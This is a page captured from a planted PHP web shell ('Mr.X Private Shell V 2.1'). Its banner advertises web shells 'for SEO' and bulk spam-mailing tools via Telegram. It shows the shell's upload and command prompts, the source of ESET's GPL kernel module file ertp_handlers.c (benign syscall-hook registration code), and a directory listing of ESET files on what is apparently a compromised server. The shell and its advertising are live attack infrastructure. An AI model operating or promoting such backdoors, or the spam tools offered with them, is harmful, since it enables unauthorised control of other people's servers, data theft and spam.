__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        

            For_More_Tools:
            
                Telegram: @jackleet | Bulk Smtp support mail sender  | Business Mail Collector  |  Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private

Upload:

Command:

[email protected]: ~ $ 
/*
 * eset_rtp (ESET Real-time file system protection module)
 * Copyright (C) 1992-2025 ESET, spol. s r.o.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 * In case of any questions, you can contact us at ESET, spol. s r.o., Einsteinova 24, 851 01 Bratislava, Slovakia.
 */


#undef CONFIG_FTRACE_SYSCALLS

#include "ertp_handlers.h"

#include "ertp_ftrace_hook.h"
#include "ertp_handlers_close.h"
#include "ertp_handlers_execve.h"
#include "ertp_handlers_exit.h"
#include "ertp_handlers_mmap.h"
#include "ertp_handlers_module.h"
#include "ertp_handlers_open.h"
#include "ertp_handlers_rename.h"
#include "ertp_handlers_unlink.h"
#include "ertp_logs.h"

#define ERTP_HOOK(syscall_name, type, handler_func, original_func_ptr)         \
  {                                                                            \
    .name = (syscall_name), .syscall_type = (type), .handler = (handler_func), \
    .original = (original_func_ptr)                                            \
  }

#define ERTP_SYSCALL64_PREFIX "__x64_sys_"

static struct ertp_ftrace_hook ertp_ftrace_hooks[] = {
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "open", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_open, &ertp_original_native_64_open),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "openat", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_openat, &ertp_original_native_64_openat),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "close", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_close, &ertp_original_native_64_close),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "dup2", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_dup2, &ertp_original_native_64_dup2),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "dup3", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_dup3, &ertp_original_native_64_dup3),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "exit", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_exit, &ertp_original_native_64_exit),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "exit_group", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_exit_group,
              &ertp_original_native_64_exit_group),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "execve", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_execve, &ertp_original_native_64_execve),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "execveat", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_execveat,
              &ertp_original_native_64_execveat),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "finit_module", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_finit_module,
              &ertp_original_native_64_finit_module),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "init_module", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_init_module,
              &ertp_original_native_64_init_module),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "mmap", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_mmap, &ertp_original_native_64_mmap),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "rename", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_rename, &ertp_original_native_64_rename),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "renameat", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_renameat,
              &ertp_original_native_64_renameat),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "renameat2", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_renameat2,
              &ertp_original_native_64_renameat2),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "unlink", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_unlink, &ertp_original_native_64_unlink),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "unlinkat", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_unlinkat,
              &ertp_original_native_64_unlinkat),

#ifdef CONFIG_COMPAT

    ERTP_HOOK("open", ERTP_SYSCALL_TYPE_COMPAT_32, ertp_handler_compat_32_open,
              &ertp_original_compat_32_open),
    ERTP_HOOK("openat", ERTP_SYSCALL_TYPE_COMPAT_32,
              ertp_handler_compat_32_openat, &ertp_original_compat_32_openat),

    ERTP_HOOK("execve", ERTP_SYSCALL_TYPE_COMPAT_32,
              ertp_handler_compat_32_execve, &ertp_original_compat_32_execve),
    ERTP_HOOK("execveat", ERTP_SYSCALL_TYPE_COMPAT_32,
              ertp_handler_compat_32_execveat,
              &ertp_original_compat_32_execveat),
    ERTP_HOOK("open", ERTP_SYSCALL_TYPE_NATIVE_32, ertp_handler_native_32_open,
              &ertp_original_native_32_open),
    ERTP_HOOK("openat", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_openat, &ertp_original_native_32_openat),
    ERTP_HOOK("close", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_close, &ertp_original_native_32_close),
    ERTP_HOOK("dup2", ERTP_SYSCALL_TYPE_NATIVE_32, ertp_handler_native_32_dup2,
              &ertp_original_native_32_dup2),
    ERTP_HOOK("dup3", ERTP_SYSCALL_TYPE_NATIVE_32, ertp_handler_native_32_dup3,
              &ertp_original_native_32_dup3),
    ERTP_HOOK("exit", ERTP_SYSCALL_TYPE_NATIVE_32, ertp_handler_native_32_exit,
              &ertp_original_native_32_exit),
    ERTP_HOOK("exit_group", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_exit_group,
              &ertp_original_native_32_exit_group),
    ERTP_HOOK("execve", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_execve, &ertp_original_native_32_execve),
    ERTP_HOOK("execveat", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_execveat,
              &ertp_original_native_32_execveat),
    ERTP_HOOK("finit_module", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_finit_module,
              &ertp_original_native_32_finit_module),
    ERTP_HOOK("init_module", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_init_module,
              &ertp_original_native_32_init_module),

    ERTP_HOOK("rename", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_rename, &ertp_original_native_32_rename),
    ERTP_HOOK("renameat", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_renameat,
              &ertp_original_native_32_renameat),
    ERTP_HOOK("renameat2", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_renameat2,
              &ertp_original_native_32_renameat2),
    ERTP_HOOK("unlink", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_unlink, &ertp_original_native_32_unlink),
    ERTP_HOOK("unlinkat", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_unlinkat,
              &ertp_original_native_32_unlinkat),
#endif
};

int ertp_handlers_init(void) {
  int err;
  size_t init_hook_no, deinit_hook_no;

  for (init_hook_no = 0; init_hook_no < ARRAY_SIZE(ertp_ftrace_hooks);
       init_hook_no++) {
    err = ertp_ftrace_hook_register(&ertp_ftrace_hooks[init_hook_no]);
    if (err) {
      goto error;
    }
  }

  ertp_pr_info("registered syscall handlers");

  return 0;

error:
  for (deinit_hook_no = 0; deinit_hook_no < init_hook_no; deinit_hook_no++) {
    ertp_ftrace_hook_unregister(&ertp_ftrace_hooks[deinit_hook_no]);
  }

  return err;
}

void ertp_handlers_deinit(void) {
  size_t hook_no;
  for (hook_no = 0; hook_no < ARRAY_SIZE(ertp_ftrace_hooks); hook_no++) {
    ertp_ftrace_hook_unregister(&ertp_ftrace_hooks[hook_no]);
  }
  ertp_pr_info("unregistered syscall handlers");
}

Filemanager

DIR : / var/ opt/ eset/ efs/ ertp/ eset_rtp/
Name Type Size Permission Actions
.ertp_array.o.cmd File 67.01 KB 0644
.ertp_cache.o.cmd File 62.05 KB 0644
.ertp_cache_container.o.cmd File 51.03 KB 0644
.ertp_debug.o.cmd File 61.29 KB 0644
.ertp_dev.o.cmd File 70.46 KB 0644
.ertp_event.o.cmd File 62.23 KB 0644
.ertp_event_check.o.cmd File 62.68 KB 0644
.ertp_excludes.o.cmd File 50.98 KB 0644
.ertp_ftrace_hook.o.cmd File 88.2 KB 0644
.ertp_ftrace_utils.o.cmd File 75.37 KB 0644
.ertp_handlers.o.cmd File 88.06 KB 0644
.ertp_handlers_close.o.cmd File 88.18 KB 0644
.ertp_handlers_execve.o.cmd File 88.54 KB 0644
.ertp_handlers_exit.o.cmd File 88.51 KB 0644
.ertp_handlers_mmap.o.cmd File 88.69 KB 0644
.ertp_handlers_module.o.cmd File 88.39 KB 0644
.ertp_handlers_open.o.cmd File 88.58 KB 0644
.ertp_handlers_rename.o.cmd File 88.54 KB 0644
.ertp_handlers_unlink.o.cmd File 88.54 KB 0644
.ertp_heap.o.cmd File 67 KB 0644
.ertp_logs.o.cmd File 15.1 KB 0644
.ertp_memory_dev.o.cmd File 70.16 KB 0644
.ertp_mod.o.cmd File 88.99 KB 0644
.ertp_path.o.cmd File 65.63 KB 0644
.ertp_qos.o.cmd File 67.84 KB 0644
.ertp_qos_event_data.o.cmd File 61.74 KB 0644
.ertp_qos_queue.o.cmd File 61.73 KB 0644
.ertp_stats.o.cmd File 61.66 KB 0644
.ertp_sysfs.o.cmd File 68.08 KB 0644
.eset_rtp.ko.cmd File 256 B 0644
.eset_rtp.mod.cmd File 612 B 0644
.eset_rtp.mod.o.cmd File 67.08 KB 0644
.eset_rtp.o.cmd File 139 B 0644
.modules.order.cmd File 95 B 0644
Makefile File 1.44 KB 0644
ertp.h File 2.24 KB 0644
ertp_array.c File 4.44 KB 0644
ertp_array.h File 2.02 KB 0644
ertp_array.o File 37.93 KB 0644
ertp_cache.c File 6.42 KB 0644
ertp_cache.h File 1.51 KB 0644
ertp_cache.o File 152.7 KB 0644
ertp_cache_container.c File 4.91 KB 0644
ertp_cache_container.h File 1.84 KB 0644
ertp_cache_container.o File 38.19 KB 0644
ertp_debug.c File 1.32 KB 0644
ertp_debug.h File 1.25 KB 0644
ertp_debug.o File 14.66 KB 0644
ertp_dev.c File 13.64 KB 0644
ertp_dev.o File 245.34 KB 0644
ertp_event.c File 20.85 KB 0644
ertp_event.h File 4.98 KB 0644
ertp_event.o File 258.2 KB 0644
ertp_event_check.c File 8.15 KB 0644
ertp_event_check.h File 1.92 KB 0644
ertp_event_check.o File 157.53 KB 0644
ertp_excludes.c File 6.42 KB 0644
ertp_excludes.h File 1.48 KB 0644
ertp_excludes.o File 56.93 KB 0644
ertp_ftrace_hook.c File 4.54 KB 0644
ertp_ftrace_hook.h File 1.37 KB 0644
ertp_ftrace_hook.o File 50.73 KB 0644
ertp_ftrace_utils.c File 1.7 KB 0644
ertp_ftrace_utils.h File 1.63 KB 0644
ertp_ftrace_utils.o File 17.97 KB 0644
ertp_handlers.c File 7.86 KB 0644
ertp_handlers.h File 1.21 KB 0644
ertp_handlers.o File 44.59 KB 0644
ertp_handlers_close.c File 3.08 KB 0644
ertp_handlers_close.h File 1.72 KB 0644
ertp_handlers_close.o File 292.04 KB 0644
ertp_handlers_execve.c File 4.37 KB 0644
ertp_handlers_execve.h File 1.75 KB 0644
ertp_handlers_execve.o File 299.2 KB 0644
ertp_handlers_exit.c File 1.97 KB 0644
ertp_handlers_exit.h File 1.49 KB 0644
ertp_handlers_exit.o File 284.45 KB 0644
ertp_handlers_mmap.c File 1.92 KB 0644
ertp_handlers_mmap.h File 1.11 KB 0644
ertp_handlers_mmap.o File 280.8 KB 0644
ertp_handlers_module.c File 4.2 KB 0644
ertp_handlers_module.h File 1.53 KB 0644
ertp_handlers_module.o File 295.03 KB 0644
ertp_handlers_open.c File 3.77 KB 0644
ertp_handlers_open.h File 1.72 KB 0644
ertp_handlers_open.o File 291.44 KB 0644
ertp_handlers_rename.c File 5.14 KB 0644
ertp_handlers_rename.h File 1.75 KB 0644
ertp_handlers_rename.o File 292.21 KB 0644
ertp_handlers_unlink.c File 3.47 KB 0644
ertp_handlers_unlink.h File 1.49 KB 0644
ertp_handlers_unlink.o File 287.87 KB 0644
ertp_heap.c File 9.87 KB 0644
ertp_heap.h File 2.04 KB 0644
ertp_heap.o File 30 KB 0644
ertp_logs.c File 1.14 KB 0644
ertp_logs.h File 2.59 KB 0644
ertp_logs.o File 10.13 KB 0644
ertp_memory_dev.c File 8.34 KB 0644
ertp_memory_dev.h File 1.33 KB 0644
ertp_memory_dev.o File 224.05 KB 0644
ertp_mod.c File 3.18 KB 0644
ertp_mod.o File 28.85 KB 0644
ertp_path.c File 4.38 KB 0644
ertp_path.h File 1.31 KB 0644
ertp_path.o File 185.7 KB 0644
ertp_qos.c File 17.06 KB 0644
ertp_qos.h File 2.18 KB 0644
ertp_qos.o File 254.39 KB 0644
ertp_qos_event_data.c File 2.41 KB 0644
ertp_qos_event_data.h File 1.61 KB 0644
ertp_qos_event_data.o File 129.95 KB 0644
ertp_qos_queue.c File 4.32 KB 0644
ertp_qos_queue.h File 1.98 KB 0644
ertp_qos_queue.o File 34.61 KB 0644
ertp_stats.c File 8.53 KB 0644
ertp_stats.h File 1.53 KB 0644
ertp_stats.o File 46.95 KB 0644
ertp_sysfs.c File 5.51 KB 0644
ertp_sysfs.o File 185.59 KB 0644
ertp_types.h File 1.15 KB 0644
eset_rtp.h File 4.2 KB 0644
eset_rtp.ko File 4.46 MB 0644
eset_rtp.mod File 755 B 0644
eset_rtp.mod.c File 8.4 KB 0644
eset_rtp.mod.o File 159.15 KB 0644
eset_rtp.o File 4.29 MB 0644
eset_rtp_sysfs.h File 1.26 KB 0644
modules.order File 20 B 0644

Copyright reserved © 2026 xtooler.online Shell Coded By Mr.X

Filemanager